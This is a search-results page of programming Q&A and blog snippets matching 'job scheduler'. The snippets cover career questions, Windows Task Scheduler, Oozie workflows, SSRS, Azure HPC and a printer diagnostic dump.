Search Results

Search found 7685 results on 308 pages for 'job scheduler'.


  • How does a CS student negotiate in/after a job interview?

    - by Billy ONeal
    Alright, I've gotten to the second step in the interview process. At this point I'm working under the assumption that I might be offered a position -- flying my butt to Redmond would be quite an expense if they weren't at least considering me for something (*crosses fingers*). So, if one is offered a position, how should a CS student negotiate? I've heard a few strategies for dealing with software companies when you are being considered for hire, but most of them assume the developer is in a powerful position. In those scenarios, (s)he has lots of job experience, and may even be overqualified for what the employer is looking for; (s)he is part of a small pool of qualified developers, because 99% of the applications companies receive are from people who are woefully underqualified. I'm in a completely different position. I think I compare favorably to most of my fellow students, and I have been a programmer for almost 10 years, but I often still feel green compared to most of my coworkers. I'm in a position where the employer holds most of the chips; they'd be doing me quite a favor by hiring me. I think this scenario is considerably different from the one most of the advice I've seen is aimed at. Above all, I don't want to be such a prick in negotiating that it damages my chances of actually landing the position, even if that means not negotiating at all. How should one approach a scenario like this? P.S. If this is off topic feel free to close it -- I think it's borderline, and I'm of the opinion that it's better to ask and be closed than not to ask at all ;)

    Read the article

  • Will an online degree get you a job that requires "CS or equivalent 4-year degree"? [on hold]

    - by qel
    I'm a nerdy slacker type who didn't get my life together till I was 30. I've had a real job for a couple years doing C#/SQL. I've gotten several raises, but I'm making less than most developers, and the atmosphere is ... not positive. Looking for a new job, I think my applications get thrown out because I don't have a degree. And I want to finish a Bachelor's just to feel like less of a loser. I have a lot of college credits from 1996-2003 and a low GPA, so I don't know if that's worth much. An online degree looks like a good option, but I just don't know what I should be looking at for online schools because they all look like fake degrees. If they had programs equivalent to a real Comp Sci degree, I don't think they would have weird sounding names like they do. University of Phoenix has a B.S./Information Technology-Software Engineering. DeVry has a B.S./Computer Engineering Technology program. But that's not CS, and most other things I see have even more fake-sounding names. Are these useless degrees? Some people say DeVry and UoP are acceptable, some people say they're a joke. I have enough experience now, though, that maybe all I'm missing is being able to check the box that I have a 4-year degree. Harvard Extension seems like a real degree, even if it isn't a real Harvard degree, but I'd have to live there at least 3 months, which kinda defeats the purpose of an online degree fitting around work.

    Read the article

  • Is there a website that scrapes job postings to determine the popularity of web technologies? [closed]

    - by dB'
    I'm often in a position where I need to choose between a number of web technologies. These technologies might be programming languages, or web application frameworks, or types of databases, or some other kind of toolkit used by programmers. More often than not, after doing some research, I end up with a list of contenders that are all equally viable. They're all powerful enough to solve my problem, they're all popular and well supported, and they're all equally familiar/unfamiliar to me. There's no obvious rationale by which to choose between them. Still, I need to pick one, so at this point I usually ask myself a hypothetical question: which one of these technologies, if I invest in learning it, would be most helpful to me in a job search? Where can I go on the internet to answer this question? Is there a website/service that scrapes the texts of worldwide job postings and would allow me to compare, say, the number of employers looking for expertise in technology x vs. technology y? (Where x and y are Rails vs. Django, Java vs. Python, Brainfuck vs. LOLCode, etc.)
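    In the absence of such a site, the comparison itself is simple once you have a pile of posting texts gathered from any source. Here is a minimal Python sketch of that counting step; the sample postings and the technology list are made up purely for illustration:

        import re
        from collections import Counter

        # Made-up posting texts standing in for whatever corpus was scraped or exported.
        postings = [
            "Senior engineer: Python, Django, PostgreSQL",
            "Full-stack developer (Rails or Django considered)",
            "Java backend developer, Spring experience required",
        ]
        technologies = ["Rails", "Django", "Java", "Python"]

        counts = Counter()
        for text in postings:
            for tech in technologies:
                # Whole-word, case-insensitive match so "Java" doesn't also count "JavaScript".
                if re.search(rf"\b{re.escape(tech)}\b", text, flags=re.IGNORECASE):
                    counts[tech] += 1

        for tech, n in counts.most_common():
            print(f"{tech}: mentioned in {n} of {len(postings)} postings")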

    Read the article

  • How do I tell my parents that landing a job is what actually counts?

    - by shovonr
    On one side, I just want to get a degree with a 3.0 GPA. On the other side, my parents want more than just a 3. Now here's the thing. I program with a passion. I spend day and night programming. And I ace all my programming courses. However, I do terrible on all my elective courses -- such as writing, history, and all that stuff -- which only leaves me with a 3.1 to 3.2 GPA. And my parents want more. They think that university is like high school, where you need super-stellar grades to get to the next level. But they don't realize that good enough grades will land me a job. And they don't realize that a programmer needs to practice to become good at programming, and that having good skills is what will land a job in a nice software development company. Thankfully, though, they don't threaten to beat me with a baseball bat or anything like that. They just occasionally give me the little "tsk-tsk". But even that little "tsk-tsk" makes me feel guilty for opening up an IDE. And on top of that, I procrastinate because of that feeling of guilt. So now, I want to come clean with them. I want to know what's a good way to do that. [Edit] OK, so now, I realized, I should aim for higher grades, as some have suggested below.

    Read the article

  • How does Windows Task Scheduler detect that a task is already running?

    - by Dan C
    I have an application on Windows Server 2008 that takes different command-line parameters. For example: myapp.exe /A myapp.exe /B I have created a task scheduler task for each of those. While "myapp.exe /A" is running, I want to prevent another instance of it from starting. However, I still want "myapp.exe /B" to be able to run (again, though only one instance of it at a time). How can I set this up?
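    For what it's worth, Task Scheduler's per-task setting "If the task is already running: Do not start a new instance" should cover this case, since /A and /B are separate tasks. A belt-and-braces option is to guard inside the application as well, keyed on the mode. A minimal Python sketch of that guard using a Windows named mutex (the mutex name is hypothetical; the same idea ports to any language):

        import ctypes
        import sys
        from ctypes import wintypes

        ERROR_ALREADY_EXISTS = 183

        def acquire_mode_mutex(mode):
            # One machine-wide named mutex per command-line mode ("A", "B", ...).
            kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
            kernel32.CreateMutexW.restype = wintypes.HANDLE
            kernel32.CreateMutexW.argtypes = [wintypes.LPVOID, wintypes.BOOL, wintypes.LPCWSTR]
            handle = kernel32.CreateMutexW(None, False, "Global\\myapp_mode_" + mode)
            if not handle:
                raise ctypes.WinError(ctypes.get_last_error())
            # CreateMutexW succeeds even when the mutex already exists; the last-error
            # flag tells us another instance of this mode currently holds it.
            return ctypes.get_last_error() != ERROR_ALREADY_EXISTS

        if __name__ == "__main__":
            mode = sys.argv[1].lstrip("/") if len(sys.argv) > 1 else "A"
            if not acquire_mode_mutex(mode):
                sys.exit(0)  # another instance is running in this mode; back off quietly
            # ... do the real work for this mode ...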

    Read the article

  • What does N years of experience with a language really mean?

    - by marcgg
    I've been looking at job descriptions since I'm graduating soon and looking for a job, and what always comes back - I'm not teaching you anything - is "N years of experience in this language". It has been discussed in this question what happens if you work professionally with, let's say, Ruby for 2 years, but during these two years you also did some C# and PHP and were actually coding in Ruby only 50% of the time. Do you say you have 1 year of experience in Ruby? 2 years? Another issue that hasn't been reviewed in the other post is "non-professional experience". I'll give you a personal example: I've been working with Ruby on Rails since 2004, while at school. I did a lot of personal projects and school projects using this technology. I also used Rails in two 6-month internships. Do I have 5 years of Rails experience (2004-now)? Do I have 1 year (2 internships)? Do I have nothing? I feel like I don't deserve the credit for 5 years, because in the first years I wasn't working a lot with Rails, but since last year I've launched some websites and invested myself a lot in this technology, and just saying 1 year doesn't really reflect how well I know the technology... Another example: I learned C++ at school and did 1 big project with it (2-3 months of work and a semester of classes). I never used it in a company, but I'd be able to be productive fairly quickly if I had to work on a C++ project, and I have a good grasp of the concepts. Do I have no experience? 3 months? 6 months? ... something else? What I'm really trying to do is find a way to present my skill set in a way that matches what recruiters expect. I also don't want to end up at an interview that would go something like this... Recruiter (finding out the horrible truth): Oh, but you said that you had 2 years of experience with this when you have none! / slaps me in the face / Me (in pain): Oh! The irony! Recruiter (yelling): Get out of my office! / calls security, punches me in the throat /

    Read the article

  • Understanding Process Scheduling in Oracle Solaris

    - by rickramsey
    The process scheduler in the Oracle Solaris kernel allocates CPU resources to processes. By default, the scheduler tries to give every process relatively equal access to the available CPUs. However, you might want to specify that certain processes be given more resources than others. That's where classes come in. A process class defines a scheduling policy for a set of processes. These three resources will help you understand and manage process classes: Blog: Overview of Process Scheduling Classes in the Oracle Solaris Kernel by Brian Bream Timesharing, interactive, fair-share scheduler, fixed priority, system, and real time. What are these? Scheduling classes in the Solaris kernel. Brian Bream describes them and how the kernel manages them through context switching. Blog: Process Scheduling at the Thread Level by Brian Bream The Fair Share Scheduler allows you to dispatch processes not just to a particular CPU, but to CPU threads. Brian Bream explains how to use it and provides examples. Docs: Overview of the Fair Share Scheduler by Oracle Solaris Documentation Team This official Oracle Solaris documentation set provides the nitty-gritty details for setting up classes and managing your processes. Covers: Introduction to the Scheduler CPU Share Definition CPU Shares and Process State CPU Share Versus Utilization CPU Share Examples FSS Configuration FSS and Processor Sets Combining FSS With Other Scheduling Classes Setting the Scheduling Class for the System Scheduling Class on a System with Zones Installed Commands Used With FSS -Rick

    Read the article

  • Building Simple Workflows in Oozie

    - by dan.mcclary
    Introduction More often than not, data doesn't come packaged exactly as we'd like it for analysis. Transformation, match-merge operations, and a host of data munging tasks are usually needed before we can extract insights from our Big Data sources. Few people find data munging exciting, but it has to be done. Once we've suffered that boredom, we should take steps to automate the process. We want to codify our work into repeatable units and create workflows which we can leverage over and over again without having to write new code. In this article, we'll look at how to use Oozie to create a workflow for the parallel machine learning task I described on Cloudera's site. Hive Actions: Prepping for Pig In my parallel machine learning article, I use data from the National Climatic Data Center to build weather models on a state-by-state basis. NCDC makes the data freely available as gzipped files of day-over-day observations stretching from the 1930s to today. In reading that post, one might get the impression that the data came in handy, ready-to-model files with convenient delimiters. The truth of it is that I need to perform some parsing and projection on the dataset before it can be modeled. If I get more observations, I'll want to retrain and test those models, which will require more parsing and projection. This is a good opportunity to start building up a workflow with Oozie. I store the data from the NCDC in HDFS and create an external Hive table partitioned by year. This gives me the flexibility of Hive's query language when I want it, but lets me put the dataset in a directory of my choosing in case I want to treat the same data with Pig or MapReduce code. CREATE EXTERNAL TABLE IF NOT EXISTS historic_weather(column1, column2) PARTITIONED BY (yr string) STORED AS ... LOCATION '/user/oracle/weather/historic'; As new weather data comes in from NCDC, I'll need to add partitions to my table. That's an action I should put in the workflow. Similarly, the weather data requires parsing in order to be useful as a set of columns. Because of its long history, the weather data is broken up into fields of specific byte lengths: x bytes for the station ID, y bytes for the dew point, and so on. The delimiting is consistent from year to year, so writing a SerDe or a parser for transformation is simple. Once that's done, I want to select columns on which to train, classify certain features, and place the training data in an HDFS directory for my Pig script to access. ALTER TABLE historic_weather ADD IF NOT EXISTS PARTITION (yr='2010') LOCATION '/user/oracle/weather/historic/yr=2011'; INSERT OVERWRITE DIRECTORY '/user/oracle/weather/cleaned_history' SELECT w.stn, w.wban, w.weather_year, w.weather_month, w.weather_day, w.temp, w.dewp, w.weather FROM ( FROM historic_weather SELECT TRANSFORM(...) USING '/path/to/hive/filters/ncdc_parser.py' as stn, wban, weather_year, weather_month, weather_day, temp, dewp, weather ) w; Since I'm going to prepare training directories with at least the same frequency that I add partitions, I should also add that to my workflow. Oozie is going to invoke these Hive actions using what's somewhat obviously referred to as a Hive action. Hive actions amount to Oozie running a script file containing our query language statements, so we can place them in a file called weather_train.hql. Starting Our Workflow Oozie offers two types of jobs: workflows and coordinator jobs. Workflows are straightforward: they define a set of actions to perform as a sequence or directed acyclic graph.
Coordinator jobs can take all the same actions as workflow jobs, but they can be automatically started either periodically or when new data arrives in a specified location. To keep things simple we'll make a workflow job; coordinator jobs simply require another XML file for scheduling. The bare minimum for workflow XML defines a name, a starting point, and an end point: <workflow-app name="WeatherMan" xmlns="uri:oozie:workflow:0.1"> <start to="ParseNCDCData"/> <end name="end"/> </workflow-app> To this we need to add an action, and within that we'll specify the Hive parameters. Also, keep in mind that actions require <ok> and <error> tags to direct the next action on success or failure. <action name="ParseNCDCData"> <hive xmlns="uri:oozie:hive-action:0.2"> <job-tracker>localhost:8021</job-tracker> <name-node>localhost:8020</name-node> <configuration> <property> <name>oozie.hive.defaults</name> <value>/user/oracle/weather_ooze/hive-default.xml</value> </property> </configuration> <script>ncdc_parse.hql</script> </hive> <ok to="WeatherMan"/> <error to="end"/> </action> There are a couple of things to note here: I have to give the FQDN (or IP) and port of my JobTracker and NameNode. I have to include a hive-default.xml file. I have to include a script file. The hive-default.xml and script file must be stored in HDFS. That last point is particularly important. Oozie doesn't make assumptions about where a given workflow is being run. You might submit workflows against different clusters, or have different hive-defaults.xml on different clusters (e.g. MySQL or Postgres-backed metastores). A quick way to ensure that all the assets end up in the right place in HDFS is just to make a working directory locally, build your workflow.xml in it, and copy the assets you'll need to it as you add actions to workflow.xml. At this point, our local directory should contain: workflow.xml hive-defaults.xml (make sure this file contains your metastore connection data) ncdc_parse.hql Adding Pig to the Ooze Adding our Pig script as an action is slightly simpler from an XML standpoint. All we do is add an action to workflow.xml as follows: <action name="WeatherMan"> <pig> <job-tracker>localhost:8021</job-tracker> <name-node>localhost:8020</name-node> <script>weather_train.pig</script> </pig> <ok to="end"/> <error to="end"/> </action> Once we've done this, we'll copy weather_train.pig to our working directory. However, there's a bit of a "gotcha" here. My pig script registers the Weka Jar and a chunk of jython. If those aren't also in HDFS, our action will fail from the outset -- but where do we put them? The Jython script goes into the working directory at the same level as the pig script, because pig attempts to load Jython files in the directory from which the script executes. However, that's not where our Weka jar goes. While Oozie doesn't assume much, it does make an assumption about the Pig classpath. Anything under working_directory/lib gets automatically added to the Pig classpath and no longer requires a REGISTER statement in the script. Anything that uses a REGISTER statement cannot be in the working_directory/lib directory. Instead, it needs to be in a different HDFS directory and attached to the pig action with an <archive> tag. Yes, that's as confusing as you think it is. You can get the exact rules for adding Jars to the distributed cache from Oozie's Pig Cookbook. Making the Workflow Work We've got a workflow defined and have collected all the components we'll need to run.
But we can't run anything yet, because we still have to define some properties about the job and submit it to Oozie. We need to start with the job properties, as this is essentially the "request" we'll submit to the Oozie server. In the same working directory, we'll make a file called job.properties as follows: nameNode=hdfs://localhost:8020 jobTracker=localhost:8021 queueName=default weatherRoot=weather_ooze mapreduce.jobtracker.kerberos.principal=foo dfs.namenode.kerberos.principal=foo oozie.libpath=${nameNode}/user/oozie/share/lib oozie.wf.application.path=${nameNode}/user/${user.name}/${weatherRoot} outputDir=weather-ooze While some of the pieces of the properties file are familiar (e.g., JobTracker address), others take a bit of explaining. The first is weatherRoot: this is essentially an environment variable for the script (as are jobTracker and queueName). We're simply using them to simplify the directives for the Oozie job. The oozie.libpath piece is extremely important. This is a directory in HDFS which holds Oozie's shared libraries: a collection of Jars necessary for invoking Hive, Pig, and other actions. It's a good idea to make sure this has been installed and copied up to HDFS. The last two lines are straightforward: run the application defined by workflow.xml at the application path listed and write the output to the output directory. We're finally ready to submit our job! After all that work we only need to do a few more things: Validate our workflow.xml Copy our working directory to HDFS Submit our job to the Oozie server Run our workflow Let's do them in order. First validate the workflow: oozie validate workflow.xml Next, copy the working directory up to HDFS: hadoop fs -put working_dir /user/oracle/working_dir Now we submit the job to the Oozie server. We need to ensure that we've got the correct URL for the Oozie server, and we need to specify our job.properties file as an argument. oozie job -oozie http://url.to.oozie.server:port_number/ -config /path/to/working_dir/job.properties -submit We've submitted the job, but we don't see any activity on the JobTracker? All I got was this funny bit of output: 14-20120525161321-oozie-oracle This is because submitting a job to Oozie creates an entry for the job and places it in PREP status. What we got back, in essence, is a ticket for our workflow to ride the Oozie train. We're responsible for redeeming our ticket and running the job. oozie job -oozie http://url.to.oozie.server:port_number/ -start 14-20120525161321-oozie-oracle Of course, if we really want to run the job from the outset, we can change the "-submit" argument above to "-run." This will prep and run the workflow immediately. Takeaway So, there you have it: the somewhat laborious process of building an Oozie workflow. It's a bit tedious the first time out, but it does present a pair of real benefits to those of us who spend a great deal of time data munging. First, when new data arrives that requires the same processing, we already have the workflow defined and ready to run. Second, as we build up a set of useful action definitions over time, creating new workflows becomes quicker and quicker.

    Read the article

  • How does a programmer who doesn't know how to program get a job? [closed]

    - by A programmer
    I often read about this and I'm curious: if there are programmers who can't program, how did they get a programming job in the first place? They must bring some value to the company they're working for, otherwise they would be fired. I don't think "programmers who don't know how to program" means "bad programmers" in this case? Even if they are bad programmers, they still know (badly) how to write (bad) programs. So what defines programmers who can't program?

    Read the article

  • What stressors do programmers encounter on the job, and how do you deal with them? [closed]

    - by Matthew Rodatus
    Learning to manage stress is vital to staying healthy while working at any job. A necessary subtask is learning to recognize and limit the sources of stress. But, in the midst of the daily grind, it can be difficult to recognize sources of stress (especially for an intense, focused persona such as a programmer). What types of stressors should programmers look out for, and how can they be managed?

    Read the article

  • Can not print after upgrading from 12.x to 14.04

    - by user318889
    After upgrading from V12.04 to V14.04 I am not able to print. I am using an HP LaserJet 400 M451dn. The printer troubleshooter told me that there is no solution to the problem. This is the output of the advanced diagnositc output. (Due to limited space I cut the output!) Can anybody tell me what is going wrong. I am using the printer via USB ? Page 1 (Scheduler not running?): {'cups_connection_failure': False} Page 2 (Is local server publishing?): {'local_server_exporting_printers': False} Page 3 (Choose printer): {'cups_dest': , 'cups_instance': None, 'cups_queue': u'HP-LaserJet-400-color-M451dn', 'cups_queue_listed': True} Page 4 (Check printer sanity): {'cups_device_uri_scheme': u'hp', 'cups_printer_dict': {'device-uri': u'hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670', 'printer-info': u'Hewlett-Packard HP LaserJet 400 color M451dn', 'printer-is-shared': True, 'printer-location': u'Pinatubo', 'printer-make-and-model': u'HP LJ 300-400 color M351-M451 Postscript (recommended)', 'printer-state': 4, 'printer-state-message': u'', 'printer-state-reasons': [u'none'], 'printer-type': 8556636, 'printer-uri-supported': u'ipp://localhost:631/printers/HP-LaserJet-400-color-M451dn'}, 'cups_printer_remote': False, 'hplip_output': (['', '\x1b[01mHP Linux Imaging and Printing System (ver. 3.14.6)\x1b[0m', '\x1b[01mDevice Information Utility ver. 5.2\x1b[0m', '', 'Copyright (c) 2001-13 Hewlett-Packard Development Company, LP', 'This software comes with ABSOLUTELY NO WARRANTY.', 'This is free software, and you are welcome to distribute it', 'under certain conditions. See COPYING file for more details.', '', '', '\x1b[01mhp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670\x1b[0m', '', '\x1b[01mDevice Parameters (dynamic data):\x1b[0m', '\x1b[01m Parameter Value(s) \x1b[0m', ' ---------------------------- ----------------------------------------------------------', ' back-end hp ', " cups-printers ['HP-LaserJet-400-color-M451dn'] ", ' cups-uri hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670 ', ' dev-file ', ' device-state -1 ', ' device-uri hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670 ', ' deviceid ', ' error-state 101 ', ' host ', ' is-hp True ', ' panel 0 ', ' panel-line1 ', ' panel-line2 ', ' port 1 ', ' serial CNFF308670 ', ' status-code 5002 ', ' status-desc ', '\x1b[01m', 'Model Parameters (static data):\x1b[0m', '\x1b[01m Parameter Value(s) \x1b[0m', ' ---------------------------- ----------------------------------------------------------', ' align-type 0 ', ' clean-type 0 ', ' color-cal-type 0 ', ' copy-type 0 ', ' embedded-server-type 0 ', ' fax-type 0 ', ' fw-download False ', ' icon hp_color_laserjet_cp2025.png ', ' io-mfp-mode 1 ', ' io-mode 1 ', ' io-support 6 ', ' job-storage 0 ', ' linefeed-cal-type 0 ', ' model HP_LaserJet_400_color_M451dn ', ' model-ui HP LaserJet 400 Color m451dn ', ' model1 HP LaserJet 400 Color M451dn ', ' monitor-type 0 ', ' panel-check-type 0 ', ' pcard-type 0 ', ' plugin 0 ', ' plugin-reason 0 ', ' power-settings 0 ', ' ppd-name lj_300_400_color_m351_m451 ', ' pq-diag-type 0 ', ' r-type 0 ', ' r0-agent1-kind 4 ', ' r0-agent1-sku CE410A/CE410X ', ' r0-agent1-type 1 ', ' r0-agent2-kind 4 ', ' r0-agent2-sku CE411A ', ' r0-agent2-type 4 ', ' r0-agent3-kind 4 ', ' r0-agent3-sku CE413A ', ' r0-agent3-type 5 ', ' r0-agent4-kind 4 ', ' r0-agent4-sku CE412A ', ' r0-agent4-type 6 ', ' scan-src 0 ', ' scan-type 0 ', ' status-battery-check 0 ', ' status-dynamic-counters 0 ', ' status-type 3 ', ' support-released True ', ' support-subtype 2202411 
', ' support-type 2 ', ' support-ver 3.12.2 ', " tech-class ['Postscript'] ", " tech-subclass ['Normal'] ", ' tech-type 4 ', ' usb-pid 3882 ', ' usb-vid 1008 ', ' wifi-config 0 ', '\x1b[01m', 'Status History (most recent first):\x1b[0m', '\x1b[01m Date/Time Code Status Description User Job ID \x1b[0m', ' -------------------- ----- ---------------------------------------- -------- --------', ' 08/21/14 00:07:25 5012 Device communication error richard 0 ', ' 08/20/14 13:42:44 500 Started a print job richard 4214 ', '', '', 'Done.', ''], ['\x1b[35;01mwarning: No display found.\x1b[0m', '\x1b[31;01merror: hp-info -u/--gui requires Qt4 GUI support. Entering interactive mode.\x1b[0m', '\x1b[31;01merror: Unable to communicate with device (code=12): hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670\x1b[0m', '\x1b[31;01merror: Error opening device (Device not found).\x1b[0m', ''], 0), 'is_cups_class': False, 'local_cups_queue_attributes': {'charset-configured': u'utf-8', 'charset-supported': [u'us-ascii', u'utf-8'], 'color-supported': True, 'compression-supported': [u'none', u'gzip'], 'copies-default': 1, 'copies-supported': (1, 9999), 'cups-version': u'1.7.2', 'device-uri': u'hp:/usb/HP_LaserJet_400_color_M451dn?serial=CNFF308670', 'document-format-default': u'application/octet-stream', 'document-format-supported': [u'application/octet-stream', u'application/pdf', u'application/postscript', u'application/vnd.adobe-reader-postscript', u'application/vnd.cups-command', u'application/vnd.cups-pdf', u'application/vnd.cups-pdf-banner', u'application/vnd.cups-postscript', u'application/vnd.cups-raw', u'application/vnd.samsung-ps', u'application/x-cshell', u'application/x-csource', u'application/x-perl', u'application/x-shell', u'image/gif', u'image/jpeg', u'image/png', u'image/tiff', u'image/urf', u'image/x-bitmap', u'image/x-photocd', u'image/x-portable-anymap', u'image/x-portable-bitmap', u'image/x-portable-graymap', u'image/x-portable-pixmap', u'image/x-sgi-rgb', u'image/x-sun-raster', u'image/x-xbitmap', u'image/x-xpixmap', u'image/x-xwindowdump', u'text/css', u'text/html', u'text/plain'], 'finishings-default': 3, 'finishings-supported': [3], 'generated-natural-language-supported': [u'en-us'], 'ipp-versions-supported': [u'1.0', u'1.1', u'2.0', u'2.1'], 'ippget-event-life': 15, 'job-creation-attributes-supported': [u'copies', u'finishings', u'ipp-attribute-fidelity', u'job-hold-until', u'job-name', u'job-priority', u'job-sheets', u'media', u'media-col', u'multiple-document-handling', u'number-up', u'output-bin', u'orientation-requested', u'page-ranges', u'print-color-mode', u'print-quality', u'printer-resolution', u'sides'], 'job-hold-until-default': u'no-hold', 'job-hold-until-supported': [u'no-hold', u'indefinite', u'day-time', u'evening', u'night', u'second-shift', u'third-shift', u'weekend'], 'job-ids-supported': True, 'job-k-limit': 0, 'job-k-octets-supported': (0, 470914416), 'job-page-limit': 0, 'job-priority-default': 50, 'job-priority-supported': [100], 'job-quota-period': 0, 'job-settable-attributes-supported': [u'copies', u'finishings', u'job-hold-until', u'job-name', u'job-priority', u'media', u'media-col', u'multiple-document-handling', u'number-up', u'output-bin', u'orientation-requested', u'page-ranges', u'print-color-mode', u'print-quality', u'printer-resolution', u'sides'], 'job-sheets-default': (u'none', u'none'), 'job-sheets-supported': [u'none', u'classified', u'confidential', u'form', u'secret', u'standard', u'topsecret', u'unclassified'], 'jpeg-k-octets-supported': (0, 
470914416), 'jpeg-x-dimension-supported': (0, 65535), 'jpeg-y-dimension-supported': (1, 65535), 'marker-change-time': 0, 'media-bottom-margin-supported': [423], 'media-col-default': u'(unknown IPP value tag 0x34)', 'media-col-supported': [u'media-bottom-margin', u'media-left-margin', u'media-right-margin', u'media-size', u'media-source', u'media-top-margin', u'media-type'], 'media-default': u'iso_a4_210x297mm', 'media-left-margin-supported': [423], 'media-right-margin-supported': [423],

    Read the article

  • What should I wear to a job interview with a game development company?

    - by Bill
    Many game development companies are less formal in terms of workplace attire than other types of software development houses. For example, I know that one place at which I will be interviewing soon has a predominant workplace culture of jeans and polos or t-shirts. Should I wear a suit? Shirt and tie? Shirt and sport jacket, with or without tie? I want to show that I'm serious about the job, but that I understand the culture, too.

    Read the article

  • IT Job Titles? What Do They Mean?

    Although only a few decades old, the information technology or IT field is as broad and deep as industries that have been around for centuries. IT job categories, titles and specialties abound -- so ... [Author: Allen B. Ury - Computers and Internet - March 27, 2010]

    Read the article

  • xcopy files and directory

    - by user1044937
    I have folders named "C:\Jobs\job#1", "C:\Jobs\job#2", "C:\Jobs\job#3", etc., with a lot of directories and sub-directories under them. I want to get all the directories under Jobs and xcopy them to C:\backup. Then I want to xcopy all the files under each job#1, 2, 3, etc. to C:\backup\job#1\month\*.* To make it clearer: Source dir = C:\Jobs\job#1\"myfiles&dir" Destination dir = C:\Backup\job#1\month\"myfiles&dir" then do the next folder Source dir = C:\Jobs\job#2\"myfiles&dir" Destination dir = C:\Backup\job#2\month\"myfiles&dir" ...until all folders are backed up. Since the job folders keep increasing, by doing it this way I don't have to add extra code to this script except to modify the month. Thank you.
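    A minimal Python sketch of the same loop, assuming the paths from the question and a hypothetical month label (the native batch equivalent would be a for /d loop around xcopy /e /i):

        from pathlib import Path
        import shutil

        SOURCE_ROOT = Path(r"C:\Jobs")
        BACKUP_ROOT = Path(r"C:\Backup")
        MONTH = "2024-06"  # hypothetical month label; change per run

        for job_dir in SOURCE_ROOT.iterdir():
            if not job_dir.is_dir():
                continue
            dest = BACKUP_ROOT / job_dir.name / MONTH
            dest.mkdir(parents=True, exist_ok=True)
            # Copy everything under C:\Jobs\job#N into C:\Backup\job#N\<month>.
            # dirs_exist_ok requires Python 3.8+.
            shutil.copytree(job_dir, dest, dirs_exist_ok=True)

    New job folders are picked up automatically, so only the month label needs changing between runs.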

    Read the article

  • Is it difficult to get a job at Microsoft?

    - by Maxtor
    I'm curious how difficult it really is to get a job working for Microsoft. Is Microsoft similar to Google in the sense that they hire people who are really good at programming? Also, does participating in communities such as the forums at Microsoft help you (if at all) with getting selected for an interview? How about being an MVP in something like C# and/or .NET? Edit: This question refers only to programming jobs.

    Read the article

  • SQL SERVER – What is SSRS and Why is SSRS asked for in many Job Openings?

    - by Pinal Dave
    This example is from Beginning SSRS by Kathi Kellenberger. Supporting files are available with a free download from the www.Joes2Pros.com web site. This will be a 5-day blog post series on getting started with SSRS; today's post will show the importance of SSRS to the business. Why is SSRS asked for in so many job openings? If you talk to an SSRS expert it's very clear to them exactly why companies really need this invention and how it saves time and adds business value. You don't have to be an SSRS expert to know its value or to start using it. For example you don't have to be an airline pilot to know the usefulness of modern transportation. Even the people who don't know how to run SSRS but need the reports can tell you why it is needed. This blog post will go into why SSRS is an important invention by showing how it improves the usage of information in your company. Even before SSRS, there has always been a need for a company to benefit from the use of its own information. Excel spreadsheets have been a popular way to do this for a long time. With SSRS you can still use this solution and gain many other options too. A friend of mine told me a story about doing database work in the 90s for a major company and how he wished SSRS had been available back then. The Vice President of the marketing channel would often come to him just before an important meeting with the board of directors. He often needed to show how certain product sales were performing over time. All this information was in the database, so it was my friend's job to get the information out and organized into a medium the VP could use. This medium was usually Excel. The VP often had meetings all over the world where he showcased this Excel report. The solution for getting the report to the VP anywhere he was in the world was an Excel file attached to an e-mail. This worked pretty well, but with some drawbacks. One time my friend sent the wrong file in the e-mail. A few minutes later my friend realized his mistake and sent another frantic e-mail to the VP. This one said to ignore the last e-mail and use this newer one. Would the VP see the correct e-mail in time? If SSRS had been available, my friend could have created a solution that let the VP run the report any time he wished. The report could have been published to the company intranet where the VP could run it from any of the offices he happened to be traveling to that month. There is a fair amount of work up front to develop and publish the report, but once that work is completed, the report can be reused as many times as needed. My friend could even be on vacation on the first day of the month and the VP could still get his real-time report. Not only could the report show the most recent data, the VP could choose to view reports of previous months with just a few clicks. The deployed SSRS solution is user friendly, and can also be configured to protect reports from being run by the wrong people. Tomorrow's Post Tomorrow's blog post will show how to know if you already have SSRS installed. If you want to learn SSRS in simple words, I strongly recommend that you get the Beginning SSRS book from Joes 2 Pros. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL Tagged: Reporting Services, SSRS

    Read the article

  • Windows Azure Recipe: High Performance Computing

    - by Clint Edmonson
    One of the most attractive ways to use a cloud platform is for parallel processing. Commonly known as high-performance computing (HPC), this approach relies on executing code on many machines at the same time. On Windows Azure, this means running many role instances simultaneously, all working in parallel to solve some problem. Doing this requires some way to schedule applications, which means distributing their work across these instances. To allow this, Windows Azure provides the HPC Scheduler. This service can work with HPC applications built to use the industry-standard Message Passing Interface (MPI). Software that does finite element analysis, such as car crash simulations, is one example of this type of application, and there are many others. The HPC Scheduler can also be used with so-called embarrassingly parallel applications, such as Monte Carlo simulations. Whatever problem is addressed, the value this component provides is the same: It handles the complex problem of scheduling parallel computing work across many Windows Azure worker role instances. Drivers Elastic compute and storage resources Cost avoidance Solution Here’s a sketch of a solution using our Windows Azure HPC SDK: Ingredients Web Role – this hosts a HPC scheduler web portal to allow web based job submission and management. It also exposes an HTTP web service API to allow other tools (including Visual Studio) to post jobs as well. Worker Role – typically multiple worker roles are enlisted, including at least one head node that schedules jobs to be run among the remaining compute nodes. Database – stores state information about the job queue and resource configuration for the solution. Blobs, Tables, Queues, Caching (optional) – many parallel algorithms persist intermediate and/or permanent data as a result of their processing. These fast, highly reliable, parallelizable storage options are all available to all the jobs being processed. Training Here is a link to online Windows Azure training labs where you can learn more about the individual ingredients described above. (Note: The entire Windows Azure Training Kit can also be downloaded for offline use.) Windows Azure HPC Scheduler (3 labs)  The Windows Azure HPC Scheduler includes modules and features that enable you to launch and manage high-performance computing (HPC) applications and other parallel workloads within a Windows Azure service. The scheduler supports parallel computational tasks such as parametric sweeps, Message Passing Interface (MPI) processes, and service-oriented architecture (SOA) requests across your computing resources in Windows Azure. With the Windows Azure HPC Scheduler SDK, developers can create Windows Azure deployments that support scalable, compute-intensive, parallel applications. See my Windows Azure Resource Guide for more guidance on how to get started, including links web portals, training kits, samples, and blogs related to Windows Azure.

    Read the article

  • Event Driven Behavior Tree: deterministic traversal order with parallel

    - by Heisenbug
